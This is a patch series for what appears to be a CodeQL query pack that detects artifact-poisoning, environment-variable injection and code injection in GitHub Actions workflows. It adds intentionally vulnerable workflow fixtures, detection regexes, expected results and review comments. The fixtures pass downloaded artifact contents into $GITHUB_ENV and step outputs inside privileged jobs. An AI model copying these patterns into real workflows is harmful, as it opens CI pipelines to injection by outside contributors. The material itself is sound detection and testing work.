@@ -425,3 +427,17 @@ testNormalizeExpr | github.event.pull_request.user["login"] | github.event.pull_request.user.login | | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $(> $GITHUB_ENV", + "echo 'sha2=$(> $GITHUB_ENV", + "echo sha3=$(> $GITHUB_ENV", + ] and + Utils::extractAssignment(t, "ENV", key, value) + ) +} + +query predicate writeToGitHubOutput(string key, string value) { + exists(string t | + t = + [ + "echo \"::set-output name=id1::$(> $GITHUB_OUTPUT", + "echo 'sha2=$(> $GITHUB_OUTPUT", + "echo sha3=$(> $GITHUB_OUTPUT", + ] and + Utils::extractAssignment(t, "OUTPUT", key, value) + ) +} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml new file mode 100644 index 00000000000..8475711949f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml 
@@ -0,0 +1,89 @@ +name: Preview Deploy + +on: + workflow_run: + workflows: ["Preview Build"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'success' + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr + + - name: save PR id + id: pr + run: echo "::set-output name=id::$( + + + body-include: '' + number: ${{ steps.pr.outputs.id }} + + - name: The job failed + if: ${{ failure() }} + uses: actions-cool/maintain-one-comment@v1.2.1 + with: + token: ${{ secrets.GITHUB_TOKEN }} + body: | + 😭 Deploy PR Preview failed. + + + + + body-include: '' + number: ${{ steps.pr.outputs.id }} + + failed: + runs-on: ubuntu-latest + if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'failure' + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr + + - name: save PR id + id: pr + run: echo "::set-output name=id::$( + + + body-include: '' + number: ${{ steps.pr.outputs.id }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml new file mode 100644 index 00000000000..f8d80cc798e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml @@ -0,0 +1,23 @@ +name: Preview Deploy + +on: + workflow_run: + workflows: ["Preview Build"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + steps: + - id: pr + name: Download Artifact + uses: redhat-plumbers-in-action/download-artifact@main + with: + name: README + + - name: upload surge service + id: deploy + run: | + echo ${{ steps.pr.outputs.id }} + 
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 6cb2c1ed399..d2e188ead67 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -2,6 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | 
@@ -64,6 +67,11 @@ nodes | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 25441104064..bc1fd870950 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -2,6 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | 
@@ -64,6 +67,11 @@ nodes | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -210,6 +218,8 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | From 56d2d8ec1000c5666258f1031237170cc1141fb6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:54:30 +0200 Subject: [PATCH 0151/1267] Update test results --- ql/test/library-tests/test.expected | 2 -- 1 file changed, 2 deletions(-) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 8b5f3e7184b..6fe9408a7a3 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -329,9 +329,7 @@ sources
 | jitterbit/get-changed-files | * | output.removed | PR changed files |
 | jitterbit/get-changed-files | * | output.renamed | PR changed files |
 | khan/pull-request-comment-trigger | * | output.comment_body | Comment body |
-| marocchino/on_artifact | * | output.* | Downloaded artifact |
 | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo |
-| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact |
 | tj-actions/branch-names | * | output.current_branch | PR current branch |
 | tj-actions/branch-names | * | output.head_ref_branch | PR head branch |
 | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run |
From 45a51a9f7417c64083fa6511cc81acaedab08b3b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:55:24 +0200 Subject: [PATCH 0152/1267] Bump qlpack versions
--- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index f689f38ef52..2b3896d0cf0 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.6
+version: 0.0.7
 dependencies:
 codeql/controlflow: "*"
 codeql/dataflow: "*"
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index f2ce850e5b8..ac6083b7d6d 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.6
+version: 0.0.7
 groups:
 - actions
 - queries
From 31a1ea9593a7efaae02ecde49c1fa62b0b8e5f22 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 17:12:00 +0200 Subject: [PATCH 0153/1267] Improve envvar injection --- ql/lib/codeql/actions/Ast.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 21 ++++++ .../actions/security/EnvVarInjectionQuery.qll | 37 ++++++--- ql/src/Security/CWE-077/EnvVarInjection.ql | 2 +- .../CWE-077/PrivilegedEnvVarInjection.ql | 2 +- ql/test/library-tests/test.expected | 6 ++ .../.github/workflows/sonar-source.yml | 75 +++++++++++++++++++ .../Security/CWE-077/EnvVarInjection.expected | 11 +++ .../PrivilegedEnvVarInjection.expected | 17 ++++- .../.github/workflows/sonar-source.yml | 71 ++++++++++++++++++ 10 files changed, 229 insertions(+), 15 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/sonar-source.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a9fe35259c5..e0da57adb6f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -34,7 +34,7 @@ module Utils { .regexpReplaceAll("^'", "") .regexpReplaceAll("'$", "") or assignment = - line.regexpCapture("(echo|Write-Output)\\s+([^'\"]*)\\s*>>\\s*(\"|')?\\$GITHUB_" + + line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$GITHUB_" + var.toUpperCase() + "(\"|')?", 2) ) and key = assignment.splitAt("=", 0).trim() and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 242cbcf9a31..e66c8e7c1b9 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -64,3 +64,24 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } + +/** + * A downloaded artifact that gets assigned to an env var declaration. + * - uses: actions/download-artifact@v2 + * - run: echo "::set-env name=id::$(>\\s*\\$GITHUB_ENV", 2) and - value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) and - expr = exprNode.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 - ) +class EnvVarInjectionFromExprSink extends DataFlow::Node { + EnvVarInjectionFromExprSink() { + exists(Expression expr, Run run, string script, string line, string key, string value | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "ENV", key, value) and + expr = this.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getRawExpression()) > 0 + ) + } +} + +class EnvVarInjectionFromFileSink extends DataFlow::Node { + EnvVarInjectionFromFileSink() { + exists(Run run, ArtifactDownloadStep step, string value | + this.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } } private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - writeToGithubEnvSink(this, _, _) or + this instanceof EnvVarInjectionFromExprSink or + this instanceof EnvVarInjectionFromFileSink or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index e758932b208..2fca3b32494 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql 
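Review bot: In `EnvVarInjectionFromExprSink`, the containment test `value.indexOf(expr.getRawExpression()) > 0` excludes offset 0, so an assignment whose value begins with the expression (nothing between the `=` and the `${{ … }}`) would not be treated as a sink. QL's `indexOf` reports offsets starting at 0, and the expected files on this page print raw expressions with their `${{ }}` delimiters, so the offset-0 case looks reachable and would be a false negative for the most direct form of the pattern. I would write `value.indexOf(expr.getRawExpression()) >= 0`. The condition is carried over from the removed `writeToGithubEnvSink` predicate, and part of this hunk's text is missing from the page, so this should be confirmed against the full file.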
@@ -29,4 +29,4 @@ where ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 811a6f65c7c..1a32183bfb2 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -25,4 +25,4 @@ where ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + sink, sink.getNode().toString() diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 6fe9408a7a3..639fbd4c530 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -329,7 +329,9 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | 
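Review bot: Switching the `$@` label to `sink.getNode().toString()` in this select, and in the matching line of PrivilegedEnvVarInjection.ql in the next hunk, makes alerts for the new file-based sink read "… injection in Run Step", which does not tell the reader which assignment is affected; the updated PrivilegedEnvVarInjection.expected rows on this page show exactly that label. For expression sinks it also drops the `${{ }}` delimiters that the previous message printed. I would keep the raw expression where the node is an expression and fall back otherwise, for example by binding a `string label` with `if sink.getNode().asExpr() instanceof Expression then label = sink.getNode().asExpr().(Expression).getRawExpression() else label = sink.getNode().toString()` and selecting `label`. The query's `from` and `where` clauses start outside the hunk.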
@@ -426,6 +428,8 @@ testNormalizeExpr | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | writeToGitHubEnv +| "sha1 | $( { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + # on develop branch, only run a baseline scan + - name: SonarCloud Scan (Baseline) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD == 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost + -Dsonar.branch.name=develop + -Dsonar.branch.target=develop + - uses: actions/github-script@v6 + with: + script: | + print("${{enb.SONAR_PR_NUM}}") + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost 
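Review bot: The `actions/github-script@v6` step near the end of this workflow fixture interpolates `${{enb.SONAR_PR_NUM}}`, which looks like a typo for the `env` context. If the step is meant to exercise the flow from the artifact-derived `SONAR_PR_NUM` variable into a script, the misspelt context means that path is probably not tested, and the expected files on this page show no result at that location. I would change the line to `print("${{ env.SONAR_PR_NUM }}")` and regenerate the expected output. The file header for this hunk is not visible on the page; it is presumably the CWE-077 copy of sonar-source.yml, since the CWE-094 copy further down has no such step.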
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index d5dbcbde086..0c4574a77cb 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -1,5 +1,16 @@ edges +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | nodes +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 2692d03eefe..6dbe7bf3c93 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected 
@@ -1,6 +1,21 @@ edges +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | nodes +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | subpaths #select -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml new file mode 100644 index 00000000000..7dc735dd6bc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml 
@@ -0,0 +1,71 @@ +name: Sonar Code Coverage Upload +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + sonar: + name: Sonar + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + steps: + - uses: actions/checkout@v4 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + # on develop branch, only run a baseline scan + - name: SonarCloud Scan (Baseline) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD == 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost + -Dsonar.branch.name=develop + -Dsonar.branch.target=develop + - name: SonarCloud Scan 